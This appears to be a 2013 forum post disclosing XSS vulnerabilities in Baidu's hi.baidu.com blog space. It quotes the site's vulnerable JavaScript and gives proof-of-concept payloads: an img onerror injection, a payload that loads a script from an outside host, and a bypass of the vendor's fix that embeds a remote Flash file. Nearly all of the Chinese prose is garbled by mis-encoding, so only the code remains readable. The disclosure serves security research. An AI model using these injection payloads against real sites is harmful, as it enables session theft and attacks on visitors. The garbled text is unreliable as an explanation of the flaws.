��̳ › web app��͸����::��Web App penetration testing�� › hi.baidu Xss ©��

admin ������ 2013-8-24 11:51:11

hi.baidu Xss ©��

�ٶȿռ�ij��������û��������δ���κι��˱�洢,�������������,���XSS.

1.��http://hi.baidu.com/p__z/modify/sppet��,�û������������Թ���,�ύ��,δ����ֱ�Ӵ���.
2.��http://hi.baidu.com/ui/scripts/pet/pet.js��

�����һ��HTML:<p style="margin-top:5px"><strong>��+F+"˵��</strong>"+BdUtil.insertWBR(F, 4)+��</p>
����BdUtil.insertWBRΪ
function(text, step) {
    var textarea = textAreaCache || getContainer();
    if (!textarea) {
      return text;
    }
    textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">");
    var string = textarea.value;
    var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi");
    var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;");
    return result;
}
����ҳ��,textAreaCache �� getContainer()��������,��!textareaΪtrue,δ������ֱ��return text.���XSS.
���Դ��룺�������Թ���������:<img src=# onerror=alert(/qing/)>
   
����creatbgmusic() Dom-Xss Bug
�ٶȿռ��Javascript Dom����creatbgmusic()���������bgmusic*û�н��й���,���¿���ͨ��initBlogTextForFCK()������������HTML���룬���յ���xss©��

��http://hi.baidu.com//js/bgmusic.js?v=1.0.js ���룺

function creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) {
    //�����murl��ֵ��bgmusic1��bgmusic2��
    //����ͨ���������ƴ������պϱ�ǩ�� "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1
    var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\"VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">";
    if (musicnum <= 1) {
      bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">";
    }
    bgmusic1 += "</OBJECT>";
    var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\"";
    if (musicnum <= 1) {
      bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" ";
    }
    bgmusic2 += "> </EMBED>";
    var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>";
    var bgmus = detectWMP();
    if (functype == "FckMusicHelper") {
      if (bgmus.installed) {
            if (bgmus.type == "IE") {
                return bgmusic1;
            } else if (bgmus.type == "NS") {
                return bgmusic2;
            }
      } else {
            return bgmusic3;
      }
    } else {
      if (bgmus.installed) {
            //document.write ֱ�����bgmusic���� ����xss
            if (bgmus.type == "IE") {
                document.write(bgmusic1);
            } else if (bgmus.type == "NS") {
                document.write(bgmusic2);
            }
      } else {
            document.write(bgmusic3);
      }
      return "";
    }
}

�ڿ��ٶȿռ����initBlogTextForFCK()������������creatbgmusic() ,�������£�

function initBlogTextForFCK(){
//fck init music
if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}}
var imgBox=document.getElementsByName(��musicName��);   //ȡ���������е�����name="musicName"�ı�ǩ����
var isAutoPlay=true;
for(var i=0,n=imgBox.length;i<n;i++){//Ȼ�����.
var img=imgBox;
if(img.getAttribute(��rel��)){      
   var musicSrc=img.getAttribute(��rel��);    //ȡ�ñ�ǩ��rel��ֵ,��ֵ��musicSrc
   var musicDiv = document.createElement("SPAN");
   var tmp=musicSrc.substr (musicSrc.indexOf(��#��)+1, 1);//��"#"Ϊ��ָ�musicSrc�ַ���,��ȡ�Զ����ŵ�flag
   
      ..........................
   
   //ֱ�ӽ�����musicSrc����creatbgmusic����.��creatbgmusic����ֱ�ӰѴ����murl��ֵ��bgmusic1��bgmusic2�в�document.write����.   
   var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(��#��)),1,true,false,tmpAutoPlay,tmpAutoPlay,��FckMusicHelper��);
   shtml=shtml.replace(��width=100%��,��width=200��).replace(��width="100%"��,��width=200 height=45��);   img.replaceNode(musicDiv);
   musicDiv.innerHTML=shtml;
   i--;n--;
}
}

������Ĵ���������Կ����������еIJ���������,����û�п�������.�ٶȿռ�ĸ��ı��༭���Ĺ���ģʽ�ǻ���HTML�﷨��,������˵�һ�����Ե�ֵ�е�HTML��ǩ.�������ǿ��Ծ��Ĺ���һ���Ķ���ı�ǩ,��JS����DOM����������XSS.
   
���Է�����<img width="200" height="45" name="musicName" rel=��"><img src=2 onerror=alert(/qing/)>#1�� src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/>

�ȴ��ٷ�����

update 2010��5��13��   

�ٷ�������

var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(��#��)),1,true,false,tmpAutoPlay,tmpAutoPlay,��FckMusicHelper��);
����
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(��#��)).replace(/[\s><()]+/g,����),1,true,false,isAutoPlay,isAutoPlay,��FckMusicHelper��);

update 2010��5��13�� 21:50:37

��������©�� û�й���" ���Լ����磺

NEW POC:

<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=��http://www.xsser.net/pz/js.swf"

allowscriptaccess="always" type="application/x-shockwave-flash"#2�� name="musicName"/>

�鿴�����汾: hi.baidu Xss ©��